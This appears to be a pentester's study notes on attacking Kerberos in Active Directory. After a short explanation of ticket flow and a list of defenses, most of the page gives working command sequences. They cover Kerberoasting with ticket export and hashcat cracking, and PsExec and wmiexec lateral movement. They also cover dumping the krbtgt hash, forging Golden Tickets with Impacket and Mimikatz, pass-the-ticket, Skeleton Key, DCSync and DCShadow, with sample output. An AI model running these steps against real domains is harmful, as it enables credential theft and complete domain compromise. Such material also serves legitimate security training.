# Kerberos ## General * 3 Heads of Kerberos: * Client > TrustedServer/DC > Server ## Ticket Flow | **Ticket Flow** | Example | | --------------------------------- | ----------------------------- | | Request TGT > | Apply for Drivers License > | | < TGT + SessionKey | < Granted with Hologram | | TGT + Request to TGS > | Request go to to ABC Store > | | < ServiceTicket | < Approved w/ ABC Hash/Ticket | | Auth to Service w/ServiceTicket > | Going to ABC Store > | ## 3 Long-Term Keys 1. Client (me) 2. Target/Service key 3. KDC (from krbtgt acct) ## Group Policy for TGT Encryption * Computer Config > Policy > Windows Settings > Security Settings * \> Local Policy > Security Options Network Security: Configure enc types allowed for Kerb ## Attack Flow 1. Find AD Accts with SPN (map between service and svc-acct) 2. Request RC4 service tickets from DC 3. Extract Service Tickets to file 4. Offline Brute Force ## Kerberoasting Targets 1. MSSQL 2. AGPMServer (for GPO) 3. FIMService (Forefront Identity) 4. STS (Security Token Service VMWare) ## Defenses: * Disable RC4 with GPO * Use AES instead * Managed Service Accounts (no pw to change) * Protected Users - pw kerberos keys arent in lsass mem * PAC validation * CredentialGuard - hash and kerb/keys cant be stolen * Services like: "sqlsvc" should not be Domain Admin ## Kerberoasting ``` Connect to pc: PsExec64.exe -accepteula -u bob \\$IP cmd.exe pw-prompt: xxxx whoami ..bob ipconfig ..$IP Pull SPN's cd \tools\ke* > cscript.exe GetUserSPNs.vbs ...or: > GetUserSPNs.py -request domain\bob -dc-ip $IP > spns.output Found 'svcqlserver' w/RC4 (bad encryption) Request Ticket for svcsqlserver: C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'" Optional: Grabs tickets with Mimikatz and export to a list cd ../mim*/x64/ mimikatz.exe kerberos::list /export exit Crack the Kerb: cd C:\Tools\Kerberoast\ python tgsrepcrack.py dictionary.txt file.kirbi hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict Connect: cd c:\Tools\Sysinternals\ PsExec64.exe -accepteula -u mydom/svcsqlserver \\$IP cmd.exe wmiexec.py mydom/svcsqlserver@10.10.10.5 whoami pw-prompt: crackedpw hostname .. DC net user svcsqlserver /domain ..part of Domain Admins, yikes! win !! ``` * Other Method: * **Powerview** > Invoke-Kerberoast ## Golden Ticket * Impacket: * secretsdump.py * wmiexec.py * lookupsid.py * ticketer.py ### Get the nthash ``` > secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets krbtgt:502:abcxyz123...:thenthashxyz1111::: | nthash ``` ### Get the FQDN ``` > wmiexec.py mydom/svcsqlserver@$IP ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DC01 Primary Dns Suffix . . . . . . . : mydom ``` ### Get the Domain SID ``` > lookupsid.py mydom/svcsqlserver@$IP Password: [*] Brute forcing SIDs at $IP [*] StringBinding ncacn_np:$IP[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666 ``` ### Create a golden ticket! ``` > ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for mydom/Administrator [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncAsRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncASRepPart [*] Saving ticket in Administrator.ccache ``` ### Abuse * The golden ticket - DO NOT EXECUTE !!! * After exporting the **Administrator.ccache** ticket file.. * You can use any tool from the impacket suite like wmiexec or psexec with **-k -no-pass** ``` > export KRB5CCNAME=Administrator.ccache > wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k --no-pass ``` ## Mimikatz * Create a Golden Ticket with Mimikatz ``` mimikatz > kerberos::golden /krbtgt :e19xyz... /admin:root /domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin Creates "golden.ticket.bin" pass-the-ticket (ptt) mimikatz > ptt golden.ticket.bin ``` ## Skeleton Key (mimikatz) * Sets up a special key for login as **pw: mimikatz** * Patches the LSA Process in Memory * Requires Admin rights and Debug Privs * Reboot to 'clear' the setup ``` mimikatz# privilege::debug mimikatz# misc::skeleton Done! ``` ## DCSync (mimikatz) * Copies the "ntds.dit" * REF: [NTDS](https://pentest.mxhx.org/07-win-privesc/ntds) ``` m> lsadump:dcsync /user:administrator ``` ## DCShadow * Similar to DCSync * Register myself as a DC * Uses replication, so almost invisible Logging ## Mimikatz GT Lab ``` ----------------- Start cd \Tools\SysInternalsSuite\ PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe c:\Windows\System32 ..now on $IP!! whoami /user ..get the sid ----------------- Imposter: cd \tools\m*\x64 > mimikatz.exe m> lsadump::dcsync /user:fakedc .. i'm a dc named 'fakedc' .. Creds: we got the ntlm hash ----------------- Ticket: m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid Created: "ticket.kirbi" ----------------- Pass-the-ticket \\10.10.10.10\c$ ..copy the ticket cd \tools\m*\x64 > mimikatz.exe kerberos::ptt c:\Users\me\Desktop\ticket.kirbi exit klist ..shows the tickets ----------------- Exploit: From 10.10.10.10 PsExec64.exe -accepteula \\dc01 cmd.exe ..will use the ticket for auth! ```